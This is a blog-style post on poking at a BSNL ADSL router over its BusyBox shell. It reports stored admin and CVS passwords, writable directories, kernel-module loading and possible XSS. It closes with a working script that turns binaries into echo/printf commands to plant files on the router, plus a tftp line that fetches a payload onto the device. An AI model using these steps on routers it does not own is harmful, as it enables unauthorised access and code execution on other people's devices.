BSNL router hacking and the possibility of running custom code on it

    On a lonely weekend on my Android, I was bored, courtesy of BSNL (the AT&T of India: a connection that seldom connects, bad service, no customer support on 1957, and flapping links). Nevertheless, I decided to mess around a bit with the BSNL ADSL router.

    On closer inspection, the BSNL router is manufactured by SEMIndia and distributed by ITI. It reuses the same Broadcom firmware base found in other vendors' routers: BCM96338 is Broadcom's reference-board designation for the BCM6338 ADSL SoC, and firmware built on that platform ships in US Robotics units and some other popular routers. Mine is a DNA-A211-1, one of the most common models in India.

    What I did:
    • Accessed the router
    • Found it ran BusyBox
    • Explored it, getting access to passwords (CVS/router/admin)
    • Found which directories were writable
    • Wrote a file to a writable area
    • Discussed the possibility of running code on it
    • Noted HTML pages that might be vulnerable to XSS/CSRF

    Observations:
    • Observation 1 - code can be run on the router, but files must be copied in using echo (-ne, with the append redirection) or tftp, since there is no scp or wget. BusyBox provides insmod, so a kernel module can be loaded as well, provided it is cross-compiled for the router's exact kernel version and its MIPS architecture (the Broadcom 63xx SoCs are MIPS); a module built for any other kernel will simply be refused.
    • Observation 2 - the webs directory has a lot of HTML files, which could perhaps be manipulated for XSS attacks (I didn't cover it as it's not my domain; someone better at it can do so).
    • Observation 3 - private CVS credentials for SEMIndia's pserver. Insider attack? Kidding. pserver is already quite insecure (it only scrambles passwords on the wire, it does not encrypt them), but since I have seen a lot of organisations using stock or easily guessable passwords on their outward-facing routers, firewalls and VPN servers, it's not a tough nut to crack.
    • Observation 4 (most important) - BSNL SUCKS!

    original thread - Prohack

    best regards
    This article was originally published in blog: BSNL router hacking and possibility of running custom code over it started by rishabhd
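The file-copy step from Observation 1, as an added example that is not part of the original post: a script run on the attacker's machine that turns any local binary into the `echo -ne '...' >> file` commands needed to rebuild it inside a BusyBox shell that has no scp or wget, with a `printf` octal variant that also works in plain POSIX sh, a byte-for-byte verification, and a probe for finding a directory that actually accepts writes. The function names, chunk size and the sample payload are my own choices; nothing here comes from the router's firmware.

```shell
#!/bin/sh
# Added example, not code from the original post. It automates the
# "copy files in with echo -ne and append" step: turn a local binary into
# shell commands that rebuild it byte-for-byte on a BusyBox box that has
# only a shell and >> redirection (no scp, no wget).
#
# Two encodings are supported:
#   echo   -> echo -ne '\xHH...' >> DEST   (the post's method; works in bash
#             and BusyBox ash, NOT in dash/POSIX sh, whose echo prints "-ne"
#             literally and has no \x escapes)
#   printf -> printf '\NNN...' >> DEST     (octal; portable to any POSIX sh,
#             BusyBox included, and used here for local verification)
# Every byte is escaped, so NUL, quotes, backslashes and '%' all survive.

# gen_push_cmds SRC DEST [echo|printf] [bytes-per-line]
# Prints the command list to stdout; chunking keeps each pasted line short.
gen_push_cmds() {
    src=$1; dest=$2; mode=${3:-printf}; chunk=${4:-32}
    case $mode in
        echo)   fmt=x1; pre='\\x'; cmd='echo -ne' ;;
        printf) fmt=o1; pre='\\';  cmd='printf' ;;
        *) echo "usage: gen_push_cmds SRC DEST [echo|printf] [bytes-per-line]" >&2; return 2 ;;
    esac
    printf ': > %s\n' "$dest"      # truncate DEST first so a re-run does not append twice
    od -An -v -t "$fmt" "$src" | tr -s ' \n' '\n\n' |
    awk -v dest="$dest" -v n="$chunk" -v pre="$pre" -v cmd="$cmd" '
        NF == 0 { next }                     # skip the blank line od leaves at the start
        { buf = buf pre $1; cnt++
          if (cnt == n) { printf "%s %c%s%c >> %s\n", cmd, 39, buf, 39, dest; buf = ""; cnt = 0 } }
        END { if (cnt) printf "%s %c%s%c >> %s\n", cmd, 39, buf, 39, dest }'
}

# On the router the generated file is pasted into the telnet/serial shell or
# fed in as `sh < push.sh`; locally the same call reproduces the copy.
apply_push_cmds() { sh "$1"; }

# verify_copy SRC DEST: exit 0 only if the two files are byte-identical.
# On the router, where cmp may be missing, compare `md5sum` output instead.
verify_copy() { cmp -s "$1" "$2"; }

# probe_writable DIR: can a file actually be created here? On a squashfs
# rootfs most directories fail this even for root; /tmp or /var usually pass.
probe_writable() {
    f="$1/.w.$$"
    ( : > "$f" ) 2>/dev/null && rm -f "$f"
}

# demo: constructed sample "binary" (NUL, newline, %, quote, backslash, high
# bytes), pushed through the printf encoding 8 bytes per line, then verified.
demo() {
    d=$(mktemp -d) || return 1
    printf 'ELF\000\001\n%%s \047\134 \377\200 end' > "$d/payload.bin"
    gen_push_cmds "$d/payload.bin" "$d/rebuilt.bin" printf 8 > "$d/push.sh"
    apply_push_cmds "$d/push.sh" && verify_copy "$d/payload.bin" "$d/rebuilt.bin"
    rc=$?
    rm -rf "$d"
    return $rc
}

demo && echo "round trip OK"
```

When the router's BusyBox includes the tftp applet, `tftp -g -r payload -l /tmp/payload <host>` against a tftp server on your own machine is far quicker than pasting echo lines; the echo/printf route is for the builds that leave it out. Either way, run `md5sum` on both ends before trusting the copy: a single dropped character in a pasted line silently corrupts the binary.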